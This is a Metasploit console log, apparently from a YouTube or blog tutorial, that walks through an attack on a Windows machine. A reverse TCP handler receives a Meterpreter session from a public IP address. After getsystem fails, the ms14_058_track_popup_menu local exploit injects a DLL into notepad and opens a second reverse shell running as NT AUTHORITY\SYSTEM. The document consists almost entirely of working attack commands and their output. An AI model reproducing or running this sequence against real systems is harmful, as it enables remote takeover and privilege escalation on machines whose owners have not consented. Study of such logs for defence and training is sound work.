[*] Exploit running as background job.
[*] Started reverse TCP handler on 192.168.1.3:7000
[*] Starting the payload handler...
msf exploit(handler) >
[*] Sending stage (957487 bytes) to 179.197.253.231
[*] Meterpreter session 1 opened (192.168.1.3:7000 -> 179.197.253.231:49233) at 2016-02-01 14:15:22 -0600
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: MsTutorial-PC\Ms Tutorial
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: Access is denied. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
meterpreter >
Background session 1? [y/N]
Start privilege escalation here
msf exploit(handler) > use exploit/windows/local/ms14_058_track_popup_menu
msf exploit(ms14_058_track_popup_menu) > set SESSION 1
SESSION => 1
msf exploit(ms14_058_track_popup_menu) > run
[*] Started reverse TCP handler on 192.168.1.3:4444
[*] Launching notepad to host the exploit...
[+] Process 1080 launched.
[*] Reflectively injecting the exploit DLL into 1080...
[*] Injecting exploit into 1080...
[*] Exploit injected. Injecting payload into 1080...
[*] Payload injected. Executing exploit...
[*] Sending stage (957487 bytes) to 192.168.1.4
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Meterpreter session 2 opened (192.168.1.3:4444 -> 192.168.1.4:49234) at 2016-02-01 14:17:08 -0600
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > visit my channel Ms Tutorial and my Blogger mstutorial